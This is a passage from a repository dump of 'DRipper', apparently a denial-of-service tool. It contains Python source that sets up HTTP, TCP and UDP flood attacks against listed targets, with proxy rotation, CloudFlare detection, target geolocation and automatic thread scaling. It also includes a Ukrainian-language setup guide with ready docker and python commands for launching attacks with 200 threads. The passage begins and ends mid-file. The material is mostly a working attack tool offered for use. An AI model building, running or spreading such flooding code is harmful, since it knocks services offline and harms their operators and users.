statistic.""" 28 | 29 | scheme: str 30 | """Connection scheme""" 31 | host: str 32 | """Original HOST name from input args. Can be domain name or IP address.""" 33 | host_ip: str 34 | """HOST IPv4 address.""" 35 | port: int 36 | """Destination Port.""" 37 | country: str = None 38 | """Country code based on target public IPv4 address.""" 39 | is_cloud_flare_protection: bool = False 40 | """Is Host protected by CloudFlare.""" 41 | attack_method: str 42 | """Current attack method.""" 43 | http_method: str 44 | """HTTP method used in HTTP packets""" 45 | 46 | min_random_packet_len: int 47 | """Minimum size for random packet length.""" 48 | max_random_packet_len: int 49 | """Limit for random packet length.""" 50 | 51 | attack_threads: list[Attack] = None 52 | """Attack-related threads.""" 53 | 54 | health_check_manager: HealthCheckManager = None 55 | time_interval_manager: TimeIntervalManager = None 56 | 57 | stats: TargetStatsManager = None 58 | """All the statistics collected separately by protocols and operations.""" 59 | 60 | @staticmethod 61 | def validate_format(target_uri: str) -> bool: 62 | try: 63 | result = urlparse(target_uri) 64 | return all([result.scheme, result.netloc]) 65 | except: 66 | return False 67 | 68 | def guess_attack_method(self): 69 | if self.scheme == 'http' or self.scheme == 'https': 70 | return 'http-flood' 71 | elif self.scheme == 'tcp': 72 | return 'tcp-flood' 73 | elif self.scheme == 'udp': 74 | return 'udp-flood' 75 | return None 76 | 77 | def __init__(self, target_uri: str, attack_method: str = None, http_method: str = ARGS_DEFAULT_HTTP_ATTACK_METHOD, 78 | min_random_packet_len: int = None, max_random_packet_len: int = None): 79 | self.attack_threads = [] 80 | self.http_method = http_method 81 | self.time_interval_manager = TimeIntervalManager() 82 | 83 | self.host_ip = DEFAULT_CURRENT_IP_VALUE 84 | self.country = GEOIP_NOT_DEFINED 85 | 86 | parts = urlparse(target_uri) 87 | self.scheme = parts.scheme 88 | # TODO rename host to hostname 89 | self.host = parts.hostname 90 | self.port = parts.port if parts.port is not None else default_scheme_port(parts.scheme) 91 | path = parts.path if parts.path else '/' 92 | query = parts.query if parts.query else '' 93 | self.http_path = path if not query else f'{path}?{query}' 94 | self.attack_method = attack_method if attack_method else self.guess_attack_method() 95 | 96 | self.health_check_manager = HealthCheckManager(target=self) 97 | self.stats = TargetStatsManager(target=self) 98 | 99 | if self.attack_method in ['http-flood', 'http-bypass']: 100 | self.min_random_packet_len = 0 if min_random_packet_len is None else min_random_packet_len 101 | self.max_random_packet_len = 0 if max_random_packet_len is None else max_random_packet_len 102 | else: 103 | self.min_random_packet_len = DEFAULT_MIN_RND_PACKET_LEN if min_random_packet_len is None else min_random_packet_len 104 | self.max_random_packet_len = DEFAULT_MAX_RND_PACKET_LEN if max_random_packet_len is None else max_random_packet_len 105 | self.min_random_packet_len = max(self.min_random_packet_len, 0) 106 | self.max_random_packet_len = max(self.max_random_packet_len, self.min_random_packet_len) 107 | 108 | def init(self): 109 | """Initialize target: get IPv4, country code and make initial checks.""" 110 | self.host_ip = common.get_ipv4(self.host) 111 | self.country = common.get_country_by_ipv4(self.host_ip) 112 | self.is_cloud_flare_protection = common.detect_cloudflare(self.uri) 113 | 114 | def add_attack_thread(self, attack: Attack): 115 | self.attack_threads.append(attack) 116 | 117 | def hostip_port_tuple(self) -> Tuple[str, int]: 118 | return self.host_ip, self.port 119 | 120 | def validate(self): 121 | """Validates target.""" 122 | if self.host_ip is None or not common.is_ipv4(self.host_ip): 123 | raise Exception(f'Cannot get IPv4 for HOST: {self.host}. Could not connect to the target HOST.') 124 | # XXX Should we call validate attack here as well? 125 | return True 126 | 127 | def cloudflare_status(self) -> str: 128 | """Get human-readable status for CloudFlare target HOST protection.""" 129 | return 'Protected' if self.is_cloud_flare_protection else 'Not protected' 130 | 131 | @property 132 | def http_url(self) -> str: 133 | """Get fully qualified HTTP URL for target HOST - http(s)://host:port/path""" 134 | http_protocol = 'https://' if self.port == 443 else 'http://' 135 | 136 | return f"{http_protocol}{self.host}:{self.port}{self.http_path}" 137 | 138 | @property 139 | def uri(self) -> str: 140 | """Get fully qualified URI for target HOST - schema://host:port""" 141 | 142 | return f"{self.scheme}://{self.host}:{self.port}{self.http_path}" 143 | 144 | def stop_attack_threads(self): 145 | for attack in self.attack_threads: 146 | attack.stop() 147 | 148 | ############################################### 149 | # Connection validators 150 | ############################################### 151 | def validate_connection(self, period_sec: int = SUCCESSFUL_CONNECTIONS_CHECK_PERIOD_SEC) -> bool: 152 | """ 153 | Check if there was successful connection for last time with interval of `period_sec`. 154 | Args: 155 | period_sec: Time interval in seconds to check for successful connection. 156 | """ 157 | period_ns = period_sec * 1000000 * 1000 158 | return self.stats.packets.connections_check_time + period_ns > time.time_ns() 159 | -------------------------------------------------------------------------------- /ripper/common.py: -------------------------------------------------------------------------------- 1 | import datetime 2 | import gzip 3 | import http.client 4 | import re 5 | import socket 6 | import random 7 | import os 8 | import subprocess 9 | import json 10 | import urllib.request 11 | 12 | import requests 13 | from rich import box 14 | from rich.console import Console 15 | from rich.panel import Panel 16 | 17 | from ripper.constants import * 18 | 19 | Target = 'Target' 20 | 21 | 22 | # Prepare static patterns once at start. 23 | IPv4_PATTERN = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$") 24 | 25 | console = Console() 26 | 27 | 28 | def read_file_lines(filename: str) -> list[str]: 29 | """Read string from fs or http""" 30 | if filename.startswith('http'): 31 | return read_file_lines_http(filename) 32 | return read_file_lines_fs(filename) 33 | 34 | 35 | def read_file_lines_fs(filename: str) -> list[str]: 36 | """Read string from file""" 37 | with open(filename, 'r') as file: 38 | return file.readlines() 39 | 40 | 41 | def read_file_lines_http(url: str) -> list[str]: 42 | """Read string from http""" 43 | data = requests.get(url, timeout=30).text 44 | return data.splitlines() 45 | 46 | 47 | def strip_lines(lines: list[str]) -> list[str]: 48 | return list(map(lambda line: line.strip(), lines)) 49 | 50 | 51 | def generate_random_bytes(min_len: int, max_len: int) -> bytes: 52 | """Generate random packet bytes.""" 53 | # No need to generate random int if we max_len = min_len 54 | if min_len == max_len: 55 | return generate_fixed_size_random_bytes(max_len) 56 | return generate_fixed_size_random_bytes(random.randint(min_len, max_len)) 57 | 58 | 59 | def generate_fixed_size_random_bytes(len: int) -> bytes: 60 | """Generate random packet bytes.""" 61 | return random.randbytes(len) 62 | 63 | 64 | def get_current_ip() -> str: 65 | """Gets user IP with external service.""" 66 | current_ip = DEFAULT_CURRENT_IP_VALUE 67 | try: 68 | # Check if curl exists in Linux/macOS 69 | rc = subprocess.call(['which', 'curl'], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) if os.name == 'posix' else 1 70 | current_ip = os.popen('curl -s ifconfig.me').readline() \ 71 | if rc == 0 else urllib.request.urlopen('https://ifconfig.me').read().decode('utf8') 72 | except: 73 | pass 74 | 75 | return current_ip if is_ipv4(current_ip) else DEFAULT_CURRENT_IP_VALUE 76 | 77 | 78 | def ns2s(time_nano: int): 79 | return time_nano / 1000000 / 1000 80 | 81 | 82 | def s2ns(time_seconds: int): 83 | return int(time_seconds * 1000000 * 1000) 84 | 85 | 86 | def format_dt(dt: datetime, fmt=DATE_TIME_FULL) -> str: 87 | """Convert datetime to string using specified format pattern.""" 88 | if dt is None: 89 | return '' 90 | return dt.strftime(fmt) 91 | 92 | 93 | def is_ipv4(ip: str) -> bool: 94 | """Check if specified string - is IPv4 format.""" 95 | match = re.match(IPv4_PATTERN, ip) 96 | 97 | return bool(match) 98 | 99 | 100 | def get_ipv4(host: str) -> str: 101 | """Get target IPv4 address by domain name.""" 102 | if is_ipv4(host): 103 | return host # do not use socket if we already have a valid IPv4 104 | 105 | try: 106 | host_ip = socket.gethostbyname(host) 107 | if is_ipv4(host_ip): 108 | return host_ip 109 | except: 110 | pass 111 | else: 112 | return DEFAULT_CURRENT_IP_VALUE 113 | 114 | 115 | def get_country_by_ipv4(host_ip: str) -> str: 116 | """Gets country of the target's IPv4.""" 117 | if host_ip is None or not is_ipv4(host_ip): 118 | return GEOIP_NOT_DEFINED 119 | 120 | country = GEOIP_NOT_DEFINED 121 | try: 122 | # Sometimes ends up in HTTP Error 429: Too Many Requests 123 | # TODO support multiple services 124 | response_body = urllib.request.urlopen(f'https://ipinfo.io/{host_ip}', timeout=3).read().decode('utf8') 125 | response_data = json.loads(response_body) 126 | country = response_data['country'] 127 | except: 128 | pass 129 | 130 | return country 131 | 132 | 133 | def detect_cloudflare(uri: str): 134 | """Check response and detect if the host protected by CloudFlare.""" 135 | parsed_uri = urllib.request.urlparse(uri) 136 | domain = '{uri.netloc}'.format(uri=parsed_uri) 137 | scheme = '{uri.scheme}'.format(uri=parsed_uri) 138 | 139 | check = http.client.HTTPSConnection(domain, timeout=3) if scheme == 'https' \ 140 | else http.client.HTTPConnection(domain, timeout=3) 141 | 142 | headers = { 143 | 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143', 144 | 'Origin': 'https://google.com', 145 | 'Referer': f'https://www.google.com/search?q={domain}&sourceid=chrome&ie=UTF-8', 146 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 147 | 'Accept-Language': 'en-us,en;q=0.5', 148 | 'Accept-Encoding': 'gzip,deflate', 149 | 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 150 | 'Connection': 'keep-alive', 151 | 'Content-Type': 'text/html' 152 | } 153 | try: 154 | check.request(method='GET', url='/', headers=headers) 155 | gzipped = check.getresponse().read() 156 | response = gzip.decompress(gzipped).decode('utf-8') 157 | for tag in CLOUDFLARE_TAGS: 158 | if response.__contains__(tag): 159 | return True 160 | except: 161 | return False 162 | 163 | return False 164 | 165 | 166 | def convert_size(size_bytes: int, units: str = 'B') -> str: 167 | """Converts size in bytes to human-readable format.""" 168 | for x in ['', 'k', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y']: 169 | if size_bytes < 1024.: return '{0:3.2f} {1}{2}'.format(size_bytes, x, units) 170 | size_bytes /= 1024. 171 | return '{0:3.2f} P{1}'.format(size_bytes, units) 172 | 173 | 174 | def get_cpu_load() -> str: 175 | if os.name == 'nt': 176 | pipe = subprocess.Popen('wmic cpu get loadpercentage', stdout=subprocess.PIPE) 177 | out = pipe.communicate()[0].decode('utf-8') 178 | out = out.replace('LoadPercentage', '').strip() 179 | 180 | return f'{out}%' 181 | else: 182 | load1, load5, load15 = os.getloadavg() 183 | cpu_usage = (load15 / os.cpu_count()) * 100 184 | 185 | return f"{cpu_usage:.2f}%" 186 | 187 | 188 | def print_panel(message: str, style: str = 'bold white on red') -> None: 189 | """Output message in the colorful box.""" 190 | console.print( 191 | Panel(message, box=box.ROUNDED), 192 | width=MIN_SCREEN_WIDTH, 193 | style=style) 194 | 195 | 196 | class Singleton(type): 197 | _instances = {} 198 | 199 | def __call__(cls, *args, **kwargs): 200 | if cls not in cls._instances: 201 | cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) 202 | return cls._instances[cls] 203 | -------------------------------------------------------------------------------- /ripper/targets_manager.py: -------------------------------------------------------------------------------- 1 | import time 2 | from enum import Enum 3 | from threading import Thread, Event, Lock 4 | from psutil import cpu_percent 5 | 6 | from ripper.context.target import Target 7 | from ripper.actions.attack import Attack 8 | from ripper.constants import * 9 | from ripper.context.events_journal import EventsJournal 10 | 11 | Context = 'Context' 12 | events_journal = EventsJournal() 13 | 14 | 15 | class ThreadsDistribution(Enum): 16 | Fixed = 'fixed', 17 | Auto = 'auto', 18 | 19 | 20 | class TargetsManagerPacketsStats: 21 | total_sent: int = 0 22 | total_sent_bytes: int = 0 23 | avg_sent_per_second: int = 0 24 | avg_sent_bytes_per_second: int = 0 25 | 26 | def __init__(self, targets: list[Target]) -> None: 27 | duration_seconds = None 28 | for target in targets: 29 | self.total_sent += target.stats.packets.total_sent 30 | self.total_sent_bytes += target.stats.packets.total_sent_bytes 31 | if duration_seconds is None: 32 | duration_seconds = target.time_interval_manager.execution_duration.total_seconds() 33 | if duration_seconds: 34 | self.avg_sent_per_second = self.total_sent / duration_seconds 35 | self.avg_sent_bytes_per_second = self.total_sent / duration_seconds 36 | 37 | def __ge__(self, other: 'TargetsManagerPacketsStats'): 38 | return self.avg_sent_per_second > other.avg_sent_per_second \ 39 | and self.avg_sent_bytes_per_second > other.avg_sent_bytes_per_second 40 | 41 | def __lt__(self, other: 'TargetsManagerPacketsStats'): 42 | return self.avg_sent_per_second < other.avg_sent_per_second \ 43 | and self.avg_sent_bytes_per_second < other.avg_sent_bytes_per_second 44 | 45 | def __eq__(self, other: 'TargetsManagerPacketsStats'): 46 | return self.avg_sent_per_second == other.avg_sent_per_second \ 47 | and self.avg_sent_bytes_per_second == other.avg_sent_bytes_per_second 48 | 49 | 50 | class AutomaticThreadsDistribution: 51 | _packet_stats: TargetsManagerPacketsStats = None 52 | _targets_manager: 'TargetsManager' = None 53 | _interval_delay_seconds: int = None 54 | _stop_event: Event = None 55 | _failed_tests_cnt: int = 0 56 | """Count of failed performance improvements checks after scale up""" 57 | 58 | def __init__(self, targets_manager: 'TargetsManager', interval_delay_seconds: int = DEFAULT_AUTOSCALE_TEST_SECONDS) -> None: 59 | self._targets_manager = targets_manager 60 | self._interval_delay_seconds = interval_delay_seconds 61 | self._stop_event = Event() 62 | 63 | def scale_up(self): 64 | threads_count = self._targets_manager.threads_count 65 | new_threads_count = threads_count + self._targets_manager.targets_count() 66 | events_journal.info(f'Scale up from {threads_count} to {new_threads_count}') 67 | self._targets_manager.set_threads_count(new_threads_count) 68 | self._targets_manager.allocate_attacks() 69 | 70 | def __runner__(self): 71 | while not self._stop_event.is_set(): 72 | time.sleep(self._interval_delay_seconds) 73 | current_packet_stats = TargetsManagerPacketsStats(targets=self._targets_manager.targets) 74 | if self._packet_stats: 75 | if self._packet_stats < current_packet_stats and cpu_percent(5) < MAX_AUTOSCALE_CPU_PERCENTAGE: 76 | self._failed_tests_cnt = 0 77 | self.scale_up() 78 | else: 79 | self._failed_tests_cnt += 1 80 | if self._failed_tests_cnt >= MAX_FAILED_FAILED_AUTOSCALE_TESTS: 81 | self.stop() 82 | self._packet_stats = current_packet_stats 83 | 84 | def start(self): 85 | events_journal.info(f'Start automatic threads distribution') 86 | Thread(target=self.__runner__).start() 87 | 88 | def stop(self): 89 | events_journal.info(f'Stop automatic threads distribution') 90 | self._stop_event.set() 91 | 92 | 93 | class TargetsManager: 94 | _targets: list[Target] = None 95 | _ctx: Context = None 96 | _lock: Lock = None 97 | _threads_count: int = None 98 | _threads_distribution: ThreadsDistribution = None 99 | 100 | def __init__(self, _ctx: Context, threads_count: int = 1, threads_distribution: ThreadsDistribution = ThreadsDistribution.Fixed): 101 | self._targets = [] 102 | self._ctx = _ctx 103 | self._lock = Lock() 104 | self._threads_count = threads_count 105 | self._threads_distribution = threads_distribution 106 | 107 | @property 108 | def free_threads_count(self): 109 | total = self.threads_count 110 | self._lock.acquire() 111 | for target in self._targets: 112 | total -= len(target.attack_threads) 113 | self._lock.release() 114 | return total 115 | 116 | @property 117 | def targets(self): 118 | return self._targets[:] 119 | 120 | @property 121 | def threads_count(self): 122 | return self._threads_count 123 | 124 | @property 125 | def threads_distribution(self): 126 | return self._threads_distribution 127 | 128 | def set_threads_count(self, threads_count: int): 129 | # We can't have fewer threads than targets 130 | self._threads_count = max(threads_count, len(self._targets)) 131 | 132 | def set_auto_threads_distribution(self): 133 | self._threads_distribution = ThreadsDistribution.Auto 134 | atd = AutomaticThreadsDistribution(targets_manager=self) 135 | atd.start() 136 | 137 | def add_target(self, target): 138 | self._targets.append(target) 139 | target_idx = self._targets.index(target) 140 | target.index = target_idx 141 | # We can't have fewer threads than targets 142 | self._threads_count = max(self._threads_count, len(self._targets)) 143 | 144 | def delete_target(self, target: Target, is_stop_attack: bool = True, is_allocate_attacks: bool = True): 145 | if is_stop_attack: 146 | target.stop_attack_threads() 147 | self._lock.acquire() 148 | try: 149 | target_idx = self._targets.index(target) 150 | self._targets.pop(target_idx) 151 | except: 152 | pass 153 | self._lock.release() 154 | if is_allocate_attacks: 155 | self.allocate_attacks() 156 | 157 | def allocate_attacks(self): 158 | free_threads_count = self.free_threads_count 159 | if free_threads_count < 1: 160 | return 161 | self._lock.acquire() 162 | targets_cnt = len(self._targets) 163 | if targets_cnt < 1: 164 | return 165 | for idx in range(free_threads_count): 166 | target = self._targets[idx % targets_cnt] 167 | Attack(_ctx=self._ctx, target=target).start() 168 | self._lock.release() 169 | 170 | def targets_count(self): 171 | return len(self._targets) 172 | -------------------------------------------------------------------------------- /ripper/context/context.py: -------------------------------------------------------------------------------- 1 | import os 2 | import time 3 | from rich.console import Console 4 | 5 | from _version import __version__ 6 | 7 | from ripper.github_updates_checker import Version 8 | from ripper import common 9 | from ripper.constants import * 10 | from ripper.proxy_manager import ProxyManager 11 | from ripper.socket_manager import SocketManager 12 | from ripper.stats.context_stats_manager import ContextStatsManager 13 | from ripper.stats.ip_info import IpInfo 14 | from ripper.context.events_journal import EventsJournal 15 | from ripper.targets_manager import TargetsManager 16 | from ripper.headers_provider import HeadersProvider 17 | from ripper.time_interval_manager import TimeIntervalManager 18 | from ripper.duration_manager import DurationManager 19 | from ripper.context.target import Target 20 | 21 | events_journal = EventsJournal() 22 | 23 | 24 | class Context(metaclass=common.Singleton): 25 | """Class (Singleton) for passing a context to a parallel processes.""" 26 | 27 | targets_manager: TargetsManager = None 28 | 29 | # ==== Input params ==== 30 | proxy_list: str 31 | """File with proxies in ip:port:username:password or ip:port line format.""" 32 | proxy_type: str 33 | """Type of proxy to work with. Supported types: socks5, socks4, http.""" 34 | dry_run: bool = False 35 | """Is dry run mode.""" 36 | 37 | # ==== Statistics ==== 38 | latest_version: Version = None 39 | current_version: Version = None 40 | myIpInfo: IpInfo = None 41 | """All the info about IP addresses and GeoIP information.""" 42 | 43 | # ========================================================================== 44 | cpu_count: int 45 | """vCPU cont of current machine.""" 46 | 47 | # ==== Internal variables ==== 48 | headers_provider: HeadersProvider = None 49 | """HTTP Headers used to make Requests.""" 50 | 51 | # External API and services info 52 | sock_manager: SocketManager = None 53 | proxy_manager: ProxyManager = None 54 | time_interval_manager: TimeIntervalManager = None 55 | duration_manager: DurationManager = None 56 | logger: Console = None 57 | stats: ContextStatsManager = None 58 | 59 | is_health_check: bool 60 | """Controls health check availability. Turn on: 1, turn off: 0.""" 61 | 62 | @staticmethod 63 | def _getattr(obj, name: str, default): 64 | value = getattr(obj, name, default) 65 | 66 | return value if value is not None else default 67 | 68 | def __init__(self, args): 69 | self.current_version = Version(__version__) 70 | attack_method = getattr(args, 'attack_method', None) 71 | 72 | self.logger = Console(width=MIN_SCREEN_WIDTH) 73 | 74 | self.targets_manager = TargetsManager(_ctx=self) 75 | 76 | self.logger.log('Getting your current Public IPv4 address...') 77 | self.myIpInfo = IpInfo(common.get_current_ip()) 78 | self.logger.log(f'Your start Public IPv4 is: {self.myIpInfo.ip_masked}') 79 | 80 | self.headers_provider = HeadersProvider() 81 | self.sock_manager = SocketManager() 82 | self.proxy_manager = ProxyManager() 83 | self.time_interval_manager = TimeIntervalManager() 84 | self.duration_manager = DurationManager(duration_seconds=getattr(args, 'duration', None)) 85 | self.is_health_check = bool(getattr(args, 'health_check', ARGS_DEFAULT_HEALTH_CHECK)) 86 | self.dry_run = getattr(args, 'dry_run', False) 87 | self.sock_manager.socket_timeout = self._getattr(args, 'socket_timeout', ARGS_DEFAULT_SOCK_TIMEOUT) 88 | self.proxy_type = getattr(args, 'proxy_type', ARGS_DEFAULT_PROXY_TYPE) 89 | self.proxy_list = getattr(args, 'proxy_list', None) 90 | 91 | # to avoid situation when vCPU might be 0 92 | self.cpu_count = max(os.cpu_count(), 1) 93 | 94 | self.connections_check_time = time.time_ns() 95 | 96 | if self.proxy_list and attack_method != 'udp-flood': 97 | self.proxy_manager.set_proxy_type(self.proxy_type) 98 | try: 99 | self.proxy_manager.update_proxy_list_from_file(self.proxy_list) 100 | except Exception as e: 101 | events_journal.exception(e) 102 | events_journal.error('Proxy list read operation failed.') 103 | 104 | # Proxies are slower, so wee needs to increase timeouts 2x times 105 | if self.proxy_manager.proxy_list_initial_len: 106 | self.sock_manager.socket_timeout *= 2 107 | 108 | if args and getattr(args, 'targets_list', None): 109 | targets_file: str = getattr(args, 'targets_list', None) 110 | message = f'Downloading targets from {targets_file}...' if targets_file.startswith('http') else 'Reading targets from file...' 111 | self.logger.log(message) 112 | input_targets = common.read_file_lines(targets_file) 113 | self.logger.log(f'Loaded list with {len(input_targets)} targets') 114 | else: 115 | # args and getattr(args, 'targets', None): 116 | input_targets = getattr(args, 'targets', []) 117 | 118 | _http_method = getattr(args, 'http_method', ARGS_DEFAULT_HTTP_ATTACK_METHOD).upper() 119 | _min_random_packet_len = getattr(args, 'min_random_packet_len', None) 120 | _max_random_packet_len = getattr(args, 'max_random_packet_len', None) 121 | for target_uri in input_targets: 122 | if target_uri.__contains__('#') or not target_uri.__contains__('://'): 123 | continue 124 | with self.logger.status('Configure attacks...') as status: 125 | status.update(f' Configuring attack for [cyan]{target_uri}[/]', spinner='aesthetic') 126 | target = Target( 127 | target_uri=target_uri, 128 | attack_method=attack_method, 129 | # TODO move http_method to target_uri to allow each target have its own method 130 | http_method=_http_method, 131 | min_random_packet_len=_min_random_packet_len, 132 | max_random_packet_len=_max_random_packet_len, 133 | ) 134 | self.targets_manager.add_target(target) 135 | 136 | arg_threads_count = getattr(args, 'threads_count', ARGS_DEFAULT_THREADS_COUNT) 137 | if arg_threads_count == 'auto': 138 | self.targets_manager.set_auto_threads_distribution() 139 | else: 140 | threads_count = int(arg_threads_count) if not self.dry_run else 1 141 | self.targets_manager.set_threads_count(threads_count) 142 | 143 | self.stats = ContextStatsManager(_ctx=self) 144 | 145 | def validate(self): 146 | """Validates context before Run script. Order is matter!""" 147 | if self.targets_manager.targets_count() < 1: 148 | self.logger.log(NO_MORE_TARGETS_LEFT_ERR_MSG) 149 | exit(1) 150 | 151 | # try: 152 | # for target in self.targets_manager.targets: 153 | # target.validate() 154 | # except Exception as e: 155 | # self.logger.log(str(e)) 156 | # exit(1) 157 | 158 | if self.myIpInfo.start_ip is None or not common.is_ipv4(self.myIpInfo.start_ip): 159 | self.logger.log( 160 | 'Cannot get your public IPv4 address. Check your VPN connection.') 161 | exit(1) 162 | -------------------------------------------------------------------------------- /docs/SetupGuide.md: -------------------------------------------------------------------------------- 1 | # Як встановити та оновити DRipper 2 | 3 | **DRipper** можна запустити двома спосбами - в docker або як python скрипт. Якщо порівнювати ці способи запуску, то запуск напряму через Python буде більш ефективнішим по використанню ресурсів Вашого ПК. А docker - це ізольване середовище, де вам нічого не потрібно встановлювати і налаштовувати, але ресурсів, Docker, використовує в рази більше. 4 | 5 | ## Що треба встановити попередньо 6 | 7 | Для запуску в Docker, Вам потрібно попередньо встановити Docker для Вашої операційної ситеми. 8 | Для запуску як python скрипт Вам порібно встановити Python 3.9 (або версію више) та Git. 9 | 10 | ### Запуск через Docker 11 | 12 | Для запуску через Docker вам потрібно запустити термінал (PowerShell для Windows, Bash для macOS, Linux) і просто запустити команду. 13 | 14 | **Windows PowerShell** 15 | ```powershell 16 | PS C:\> docker run -it --rm --pull=always alexmon1989/dripper:latest -t 200 -s tcp://site1.com:80 17 | ``` 18 | 19 | **macOS/Linux Bash** 20 | ```bash 21 | $ docker run -it --rm --pull=always alexmon1989/dripper:latest -t 200 -s tcp://site1.com:80 22 | ``` 23 | 24 | Ці команди однакові, вони завантажать **docker image** останньої версії та запустять атаку, відповідно до вказаних параметрів. 25 | В данному прикладі, параметри атакі, це: **-t 200 -s tcp://site1.com:80**, де **-t 200** - кількість потоків, **-s tcp://site1.com:80** - ціль 26 | 27 | --- 28 | 29 | ### Запуск Python скрипта 30 | 31 | Якщо Ви ще не встановлювали **DRipper**, то Вам потрібно завантажити актуальну версію та встановити всі необходні бібліотеки для роботи скрипта, це дуже просто. 32 | 33 | Запускаємо термінал (PowerShell для Windows, Bash для macOS/Linux), та переходимо до директорії (папка), куди будуть завантажені файли скрипта, наприклад: 34 | 35 | **Windows PowerShell** 36 | ```powershell 37 | # Створимо папку dripper в корні диска С: 38 | PS C:\> mkdir C:\dripper 39 | # Перейдемо в папку де будуть завантажений dripper 40 | PS C:\> cd C:\dripper 41 | 42 | # Завантажуємо актуальну версію з git репозиторію 43 | PS: C:\dripper\> git clone https://github.com/alexmon1989/russia_ddos 44 | PS: C:\dripper\> cd russia_ddos 45 | 46 | ## Встановлюємо всі необхідні бібліотеки 47 | PS: C:\dripper\russia_ddos\> python3 -m pip install -r requirements.txt 48 | 49 | ## Запуск скрипта 50 | PS: C:\dripper\russia_ddos\> python3 DRipper.py -t 200 -s tcp://site1.com:80 51 | ``` 52 | 53 | **macOS/Linux Bash** 54 | ```bash 55 | # Створимо папку dripper в директорії користувача (Home folder) 56 | ~ $ mkdir ~/dripper 57 | # Перейдемо в папку де будуть завантажений dripper 58 | ~ $ cd ~/dripper 59 | 60 | # Завантажуємо актуальну версію з git репозиторію 61 | ~/dripper $ git clone https://github.com/alexmon1989/russia_ddos 62 | ~/dripper $ cd russia_ddos 63 | 64 | ## Встановлюємо всі необхідні бібліотеки 65 | ~/dripper/russia_ddos $ python3 -m pip install -r requirements.txt 66 | 67 | ## Запуск скрипта 68 | ~/dripper/russia_ddos $ python3 DRipper.py -t 200 -s tcp://site1.com:80 69 | ``` 70 | 71 | --- 72 | 73 | ## Оновлення DRipper 74 | 75 | ### Для **Docker** можна використати декілька способів: 76 | 77 | - Завжди використовувати тег `latest`, при цьому додати `--pull=always`, наприклад: `--pull=always alexmon1989/dripper:latest` 78 | - Використовувати **docker image** з новою версією, явно вказавши версію, наприклад: `alexmon1989/dripper:2.5.0` 79 | 80 | ### Розглянемо на прикладах: 81 | 82 | Припустімо, що у Вас зараз версія **2.4.0** і Ви бажаєте оновити до останньої **2.5.0**, використовуючи **Docker** 83 | 84 | ```bash 85 | # Оновлення до актуальної версії, використовуючи тег latest 86 | docker run -it --rm --pull=always alexmon1989/dripper:latest --version 87 | 88 | # Оновлення до актуальної версії, використовуючи версію як тег 89 | docker run -it --rm alexmon1989/dripper:2.5.0 --version 90 | ``` 91 | 92 | Загалом, стратегія оновлення дуже проста, Ви можете використовувати нову версію, як тільки вона вийде, просто написавши версію в якості тега. Або час від часу, наприклад раз на тиждень, додавати `--pull=always` до команди запуску в докері, якщо Ви використовуєте тег `latest` 93 | 94 | 95 | ### Для Python оновлення дуже просте 96 | 97 | Для оновлення, треба просто завантажити за допомогою **git** останні зміни і повторно запустити встановлення бібліотек. Для цього Вам треба в терміналі перейти в директорію зі скриптом і виконати всього дві команди: 98 | 99 | ```bash 100 | cd russia_ddos 101 | 102 | git pull 103 | 104 | python3 -m pip install -r requirements.txt 105 | ``` 106 | 107 | Після цього Ви можете запускати команди і виконувати атаки. 108 | 109 | --- 110 | 111 | ## Допомога з параметрами скрипта 112 | 113 | Якщо Ви не знаєте які параметри у скрипта і на що вони впливають, завжди можна запустити команду `--help` і подивитися детально який параметр і для чого використовується, наприклад: 114 | 115 | ```bash 116 | # Docker 117 | docker run -it --rm alexmon1989/dripper:latest --help 118 | 119 | # Python 120 | python3 DRipper.py --help 121 | 122 | # Приклад виводу команди --help: 123 | Usage: DRipper.py [options] arg 124 | 125 | Options: 126 | --version show program's version number and exit 127 | -h, --help show this help message and exit 128 | -s TARGETS, --targets=TARGETS Attack target in {scheme}://{hostname}[:{port}][{path}] format. 129 | Multiple targets allowed. 130 | -m ATTACK_METHOD, --method=ATTACK_METHOD Attack method: udp-flood, tcp-flood, http-flood, http-bypass 131 | -e HTTP_METHOD, --http-method=HTTP_METHOD HTTP method. Default: GET 132 | -t THREADS_COUNT, --threads=THREADS_COUNT Total threads count. Default: 100 133 | -r RANDOM_PACKET_LEN, --random-len=RANDOM_PACKET_LEN Send random packets with random length. Default: 1 134 | -l MAX_RANDOM_PACKET_LEN, --max-random_packet-len=MAX_RANDOM_PACKET_LEN 135 | Max random packets length. Default: 1024 for udp/tcp 136 | -y PROXY_LIST, --proxy-list=PROXY_LIST File (fs or http/https) with proxies in 137 | ip:port:username:password line format. Proxies will be ignored 138 | in udp attack! 139 | -k PROXY_TYPE, --proxy-type=PROXY_TYPE Type of proxy to work with. Supported types: socks5, socks4, 140 | http. Default: socks5 141 | -c HEALTH_CHECK, --health-check=HEALTH_CHECK Controls health check availability. Turn on: 1, turn off: 0. 142 | Default: 1 143 | -o SOCKET_TIMEOUT, --socket-timeout=SOCKET_TIMEOUT Timeout for socket connection is seconds. Default (seconds): 1 144 | without proxy, 2 with proxy 145 | --dry-run Print formatted output without full script running. 146 | --log-size=LOG_SIZE Set the Events Log history frame length. 147 | --log-level=EVENT_LEVEL Log level for events board. Supported levels: info, warn, error, 148 | none. 149 | -d DURATION, --duration=DURATION Attack duration in seconds. After this duration script will stop 150 | it's execution. 151 | 152 | Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80 153 | ``` 154 | 155 | --- 156 | 157 | ## Як дізнатися, що нового в тій чи іншій версії 158 | 159 | Для тих, хто використовує запуск скрипта напряму через Python - Ви завжди маєте всю кодову базу разом з історією змін (CHANGELOG.md). Файл текстовий, його можна відкрити за допомогою будь-якого текстового редактора і подивитися детальну історію змін. Або просто перейдіть за посиланням, та подивіться на історію змін онлайн - [CHANGELOG.md](https://github.com/alexmon1989/russia_ddos/blob/main/CHANGELOG.md) 160 | -------------------------------------------------------------------------------- /ripper/health_check_manager.py: -------------------------------------------------------------------------------- 1 | import random 2 | import re 3 | import json 4 | import threading 5 | import urllib 6 | import gzip 7 | import time 8 | import datetime 9 | from collections import defaultdict 10 | from enum import Enum 11 | from urllib.error import HTTPError 12 | 13 | from 